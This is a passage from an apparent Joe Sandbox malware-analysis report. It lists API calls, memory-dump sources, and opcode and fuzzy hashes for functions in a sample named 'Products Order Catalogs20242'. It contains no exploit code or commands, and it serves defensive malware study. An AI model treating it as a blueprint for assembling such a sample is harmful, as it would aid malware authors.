                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 3321077145-0
                                                                                                • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 004505BF
                                                                                                • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 2351499541-0
                                                                                                • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                APIs
                                                                                                  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                • __itow.LIBCMT ref: 00461461
                                                                                                • __itow.LIBCMT ref: 004614AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$__itow$_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 2875217250-0
                                                                                                • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0040E202
                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell__memset
                                                                                                • String ID:
                                                                                                • API String ID: 928536360-0
                                                                                                • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00472806
                                                                                                  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                • String ID:
                                                                                                • API String ID: 2759813231-0
                                                                                                • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                APIs
                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                • String ID:
                                                                                                • API String ID: 2169480361-0
                                                                                                • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 00448CB8
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                APIs
                                                                                                • select.WSOCK32 ref: 0045890A
                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastacceptselect
                                                                                                • String ID:
                                                                                                • API String ID: 385091864-0
                                                                                                • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                                                • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                                                • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                • String ID:
                                                                                                • API String ID: 1358664141-0
                                                                                                • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 2880819207-0
                                                                                                • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 357397906-0
                                                                                                • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                APIs
                                                                                                • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                • String ID:
                                                                                                • API String ID: 1187119602-0
                                                                                                • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1597257046-0
                                                                                                • Opcode ID: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
                                                                                                • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                • Opcode Fuzzy Hash: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
                                                                                                • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3349847261-0
                                                                                                • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
